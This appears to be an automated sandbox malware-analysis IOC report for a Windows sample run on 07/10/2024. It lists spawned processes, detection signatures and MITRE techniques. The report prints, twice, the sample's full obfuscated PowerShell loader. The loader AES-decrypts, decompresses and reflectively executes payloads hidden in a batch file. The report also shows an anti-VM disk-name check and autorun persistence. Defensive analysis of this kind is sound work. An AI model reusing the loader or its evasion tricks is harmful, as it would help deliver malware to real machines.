Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

cmd /c "vclib.bat"

Details

Is windows:	true
Is dropped:	false
PID:	5564
Target ID:	2
Parent PID:	5192
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	cmd /c "vclib.bat"
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	18:29:05
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7d9ae0000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious command line found	Data Obfuscation	Command and Scripting Interpreter
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes batch files	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\wbem\WMIC.exe

wmic diskdrive get Model

Details

Is windows:	true
Is dropped:	false
PID:	5840
Target ID:	4
Parent PID:	5564
Name:	WMIC.exe
Class:	system-tools
Path:	C:\Windows\System32\wbem\WMIC.exe
Commandline:	wmic diskdrive get Model
Size:	576000
MD5:	C37F2F4F4B3CD128BDABCAEB2266A785
Time:	18:29:05
Date:	07/10/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff615920000
Modulesize:	598016
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));

Details

Is windows:	true
Is dropped:	false
PID:	796
Target ID:	6
Parent PID:	5564
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	18:29:07
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7d9ae0000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious command line found	Data Obfuscation	Command and Scripting Interpreter
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes batch files	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden

Details

Is windows:	true
Is dropped:	false
PID:	3352
Target ID:	7
Parent PID:	5564
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell.exe -WindowStyle Hidden
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	18:29:07
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6cb6b0000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected UAC Bypass using CMSTP	Exploits
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Users\user\Desktop\XgKnAQpuPM.exe

"C:\Users\user\Desktop\XgKnAQpuPM.exe"

Details

Is windows:	false
Is dropped:	false
PID:	5192
Target ID:	0
Parent PID:	4084
Name:	XgKnAQpuPM.exe
Path:	C:\Users\user\Desktop\XgKnAQpuPM.exe
Commandline:	"C:\Users\user\Desktop\XgKnAQpuPM.exe"
Size:	3571712
MD5:	52C1ACDCBB715DD099648B26B98254E8
Time:	18:29:04
Date:	07/10/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff776d10000
Modulesize:	3575808
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Binary contains a suspicious time stamp	Data Obfuscation	Timestomp
PE file contains executable resources (Code or Archives)	System Summary
Sample file is different than original file name gathered from version info	System Summary
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
PE file has an executable .text section and no other executable section	System Summary
Spawns processes	System Summary	Process Injection
PE file contains a valid data directory to section mapping	System Summary
Binary contains paths to debug symbols	Compliance, System Summary
PE file contains a debug data directory	System Summary
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a mix of data directories often seen in goodware	System Summary
PE file has a big raw section	System Summary
PE file has a high image base, often used for DLLs	System Summary
Submission file is bigger than most known malware samples	System Summary

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	6736
Target ID:	3
Parent PID:	5564
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	18:29:05
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6ee680000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\findstr.exe

findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"

Details

Is windows:	true
Is dropped:	false
PID:	6700
Target ID:	5
Parent PID:	5564
Name:	findstr.exe
Class:	system-tools
Path:	C:\Windows\System32\findstr.exe
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
Size:	36352
MD5:	804A6AE28E88689E0CF1946A6CB3FEE5
Time:	18:29:05
Date:	07/10/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6add80000
Modulesize:	94208
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576

Details

Is windows:	true
Is dropped:	false
PID:	3364
Target ID:	10
Parent PID:	3352
Name:	WerFault.exe
Path:	C:\Windows\System32\WerFault.exe
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
Size:	570736
MD5:	FD27D9F6D02763BDE32511B5DF7FF7A0
Time:	18:29:13
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6a78f0000
Modulesize:	581632
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
One or more processes crash	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"

Details

Is windows:	true
Is dropped:	false
PID:	4064
Target ID:	12
Parent PID:	4084
Name:	rundll32.exe
Class:	rundll32
Path:	C:\Windows\System32\rundll32.exe
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Size:	71680
MD5:	EF3179D498793BF4234F708D3BE28633
Time:	18:29:15
Date:	07/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6b7a40000
Modulesize:	94208
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Runs a DLL by calling functions	System Summary	Rundll32
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://nuget.org/NuGet.exe

unknown

http://pesterbdd.com/images/Pester.png

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://contoso.com/License

unknown

https://aka.ms/pscore6xG

unknown

https://contoso.com/Icon

unknown

http://upx.sf.net

unknown

https://aka.ms/pscore6

unknown

https://aka.ms/pscore68

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://github.com/Pester/Pester

unknown

There are 3 hidden URLs, click here to show them.

Domains

Name

Malicious

198.187.3.20.in-addr.arpa

unknown

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

wextract_cleanup0